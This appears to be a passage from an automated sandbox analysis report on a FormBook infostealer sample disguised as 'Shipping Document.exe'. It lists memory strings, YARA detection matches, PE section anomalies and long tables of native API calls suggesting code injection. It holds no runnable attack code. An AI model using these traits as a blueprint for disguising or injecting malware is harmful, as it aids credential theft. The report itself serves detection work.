                Source: xcopy.exe, 00000016.00000002.3688129480.0000000003534000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: xcopy.exe, 00000016.00000002.3688129480.0000000003534000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: xcopy.exe, 00000016.00000002.3688129480.0000000003534000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: xcopy.exe, 00000016.00000002.3688129480.0000000003534000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: xcopy.exe, 00000016.00000003.1618500095.000000000862A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3702891578.0000000003C54000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702794231.00000000044F4000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 00000016.00000002.3705040296.0000000006B80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.1732049083.000000001F574000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.Shipping Document.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.Shipping Document.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1435018247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3687248383.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3704953659.0000000005CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3701996615.0000000003900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1436402174.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3699622847.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3701837200.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1438223772.0000000001420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Shipping Document.exe
                PE file contains section with special chars
                Source: Shipping Document.exeStatic PE information: section name: taM%C#%u
                Source: KOENBvWt.exe.0.drStatic PE information: section name: taM%C#%u
                PE file has nameless sections
                Source: Shipping Document.exeStatic PE information: section name:
                Source: KOENBvWt.exe.0.drStatic PE information: section name:
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_099735F8 NtUnmapViewOfSection,0_2_099735F8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_099735F0 NtUnmapViewOfSection,0_2_099735F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0042C953 NtClose,10_2_0042C953
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142B60 NtClose,LdrInitializeThunk,10_2_01142B60
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_01142DF0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_01142C70
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011435C0 NtCreateMutant,LdrInitializeThunk,10_2_011435C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01144340 NtSetContextThread,10_2_01144340
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01144650 NtSuspendThread,10_2_01144650
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142B80 NtQueryInformationFile,10_2_01142B80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142BA0 NtEnumerateValueKey,10_2_01142BA0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142BF0 NtAllocateVirtualMemory,10_2_01142BF0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142BE0 NtQueryValueKey,10_2_01142BE0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142AB0 NtWaitForSingleObject,10_2_01142AB0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142AD0 NtReadFile,10_2_01142AD0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142AF0 NtWriteFile,10_2_01142AF0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142D10 NtMapViewOfSection,10_2_01142D10
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142D00 NtSetInformationFile,10_2_01142D00
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142D30 NtUnmapViewOfSection,10_2_01142D30
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142DB0 NtEnumerateKey,10_2_01142DB0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142DD0 NtDelayExecution,10_2_01142DD0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142C00 NtQueryInformationProcess,10_2_01142C00
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142C60 NtCreateKey,10_2_01142C60
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142CA0 NtQueryInformationToken,10_2_01142CA0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142CC0 NtQueryVirtualMemory,10_2_01142CC0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142CF0 NtOpenProcess,10_2_01142CF0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142F30 NtCreateSection,10_2_01142F30
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142F60 NtCreateProcessEx,10_2_01142F60
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142F90 NtProtectVirtualMemory,10_2_01142F90
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142FB0 NtResumeThread,10_2_01142FB0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142FA0 NtQuerySection,10_2_01142FA0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142FE0 NtCreateFile,10_2_01142FE0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142E30 NtWriteVirtualMemory,10_2_01142E30
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142E80 NtReadVirtualMemory,10_2_01142E80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142EA0 NtAdjustPrivilegesToken,10_2_01142EA0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142EE0 NtQueueApcThread,10_2_01142EE0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01143010 NtOpenDirectoryObject,10_2_01143010
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01143090 NtSetValueKey,10_2_01143090
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011439B0 NtGetContextThread,10_2_011439B0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01143D10 NtOpenProcessToken,10_2_01143D10
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01143D70 NtOpenThread,10_2_01143D70
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B528300_2_00B52830
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B508710_2_00B50871
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B549700_2_00B54970
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B53AC80_2_00B53AC8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B52B190_2_00B52B19
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B51CEF0_2_00B51CEF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B530E00_2_00B530E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B564100_2_00B56410
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B564000_2_00B56400
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B535600_2_00B53560
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B527FE0_2_00B527FE
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B567200_2_00B56720
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B5489C0_2_00B5489C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B558980_2_00B55898
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B558880_2_00B55888
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B56AA00_2_00B56AA0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B56A900_2_00B56A90
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B56CB00_2_00B56CB0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B56CC00_2_00B56CC0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B56F500_2_00B56F50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B56F400_2_00B56F40
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_07FB16780_2_07FB1678
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_07FBD5480_2_07FBD548
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_07FB48100_2_07FB4810
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_07FBD5390_2_07FBD539
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_07FBE1D80_2_07FBE1D8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_07FBE1BE0_2_07FBE1BE
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_07FB0EA80_2_07FB0EA8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_07FB0E450_2_07FB0E45
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_094A1AB80_2_094A1AB8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_094A1AAC0_2_094A1AAC
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_099780C90_2_099780C9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09970C800_2_09970C80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_099710B70_2_099710B7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_099710B80_2_099710B8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_099708470_2_09970847
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_099708480_2_09970848
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_099727900_2_09972790
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09979F500_2_09979F50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A42C400_2_09A42C40
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A411D10_2_09A411D1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A405F00_2_09A405F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A4A4F00_2_09A4A4F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A407B90_2_09A407B9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A437000_2_09A43700
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A419B00_2_09A419B0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A419C00_2_09A419C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A419680_2_09A41968
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A400260_2_09A40026
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A400400_2_09A40040
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A4C3900_2_09A4C390
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A405E00_2_09A405E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A416980_2_09A41698
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09A416580_2_09A41658
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09BE75400_2_09BE7540
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09BE12A00_2_09BE12A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09BE752A0_2_09BE752A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_09BE9CF00_2_09BE9CF0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_004187C310_2_004187C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0040E15310_2_0040E153
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0041016310_2_00410163
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_004169C310_2_004169C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_004169BF10_2_004169BF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0040E29710_2_0040E297
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0040E2A310_2_0040E2A3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_004023CD10_2_004023CD
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_004023D010_2_004023D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_004044DA10_2_004044DA
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0040FF4310_2_0040FF43
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00402F5010_2_00402F50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0040FF3F10_2_0040FF3F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0042EFA310_2_0042EFA3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AA11810_2_011AA118
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110010010_2_01100100
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0119815810_2_01198158
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D01AA10_2_011D01AA
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C41A210_2_011C41A2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C81CC10_2_011C81CC
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A200010_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CA35210_2_011CA352
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E3F010_2_0111E3F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D03E610_2_011D03E6
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B027410_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011902C010_2_011902C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111053510_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D059110_2_011D0591
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B442010_2_011B4420
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C244610_2_011C2446
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BE4F610_2_011BE4F6
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113475010_2_01134750
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111077010_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110C7C010_2_0110C7C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112C6E010_2_0112C6E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112696210_2_01126962
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A010_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011DA9A610_2_011DA9A6
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111A84010_2_0111A840
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111284010_2_01112840
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F68B810_2_010F68B8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E8F010_2_0113E8F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CAB4010_2_011CAB40
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C6BD710_2_011C6BD7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA8010_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011ACD1F10_2_011ACD1F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111AD0010_2_0111AD00
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01128DBF10_2_01128DBF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110ADE010_2_0110ADE0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110C0010_2_01110C00
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0CB510_2_011B0CB5
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01100CF210_2_01100CF2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01130F3010_2_01130F30
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B2F3010_2_011B2F30
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01152F2810_2_01152F28
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01184F4010_2_01184F40
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118EFA010_2_0118EFA0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01102FC810_2_01102FC8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111CFE010_2_0111CFE0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CEE2610_2_011CEE26
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110E5910_2_01110E59
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01122E9010_2_01122E90
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CCE9310_2_011CCE93
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CEEDB10_2_011CEEDB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011DB16B10_2_011DB16B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0114516C10_2_0114516C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FF17210_2_010FF172
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111B1B010_2_0111B1B0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011170C010_2_011170C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BF0CC10_2_011BF0CC
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C70E910_2_011C70E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CF0E010_2_011CF0E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C132D10_2_011C132D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FD34C10_2_010FD34C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0115739A10_2_0115739A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011152A010_2_011152A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112B2C010_2_0112B2C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B12ED10_2_011B12ED
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C757110_2_011C7571
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AD5B010_2_011AD5B0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D95C310_2_011D95C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CF43F10_2_011CF43F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110146010_2_01101460
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CF7B010_2_011CF7B0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0115563010_2_01155630
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C16CC10_2_011C16CC
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A591010_2_011A5910
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111995010_2_01119950
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112B95010_2_0112B950
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117D80010_2_0117D800
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011138E010_2_011138E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CFB7610_2_011CFB76
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112FB8010_2_0112FB80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01185BF010_2_01185BF0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0114DBF910_2_0114DBF9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CFA4910_2_011CFA49
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C7A4610_2_011C7A46
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01183A6C10_2_01183A6C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01155AA010_2_01155AA0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011ADAAC10_2_011ADAAC
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B1AA310_2_011B1AA3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BDAC610_2_011BDAC6
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C1D5A10_2_011C1D5A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01113D4010_2_01113D40
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C7D7310_2_011C7D73
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112FDC010_2_0112FDC0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01189C3210_2_01189C32
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CFCF210_2_011CFCF2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CFF0910_2_011CFF09
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01111F9210_2_01111F92
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CFFB110_2_011CFFB1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010D3FD510_2_010D3FD5
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010D3FD210_2_010D3FD2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01119EB010_2_01119EB0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115497012_2_01154970
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115283012_2_01152830
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115087212_2_01150872
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01152B1912_2_01152B19
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01153AC812_2_01153AC8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01151CEF12_2_01151CEF
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_011530E012_2_011530E0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115356012_2_01153560
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115641012_2_01156410
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115672012_2_01156720
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115275112_2_01152751
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115279012_2_01152790
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115487F12_2_0115487F
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115589812_2_01155898
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115588812_2_01155888
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01156AA012_2_01156AA0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01156CB012_2_01156CB0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01156CC012_2_01156CC0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01156F5012_2_01156F50
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01156F4012_2_01156F40
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_04B9D4B112_2_04B9D4B1
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_04BB754012_2_04BB7540
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_04BB9CF012_2_04BB9CF0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_04BB753C12_2_04BB753C
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B869812_2_062B8698
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B234812_2_062B2348
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B279012_2_062B2790
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B081312_2_062B0813
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B0C7012_2_062B0C70
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B084812_2_062B0848
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B10B812_2_062B10B8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B0C8012_2_062B0C80
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B41F012_2_062B41F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0846EE3012_2_0846EE30
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884481012_2_08844810
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884D54812_2_0884D548
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884167812_2_08841678
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_08840EA712_2_08840EA7
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_08840EA812_2_08840EA8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884E1C812_2_0884E1C8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884E1D812_2_0884E1D8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884D53912_2_0884D539
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_088447F012_2_088447F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A002C4012_2_0A002C40
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0011D112_2_0A0011D1
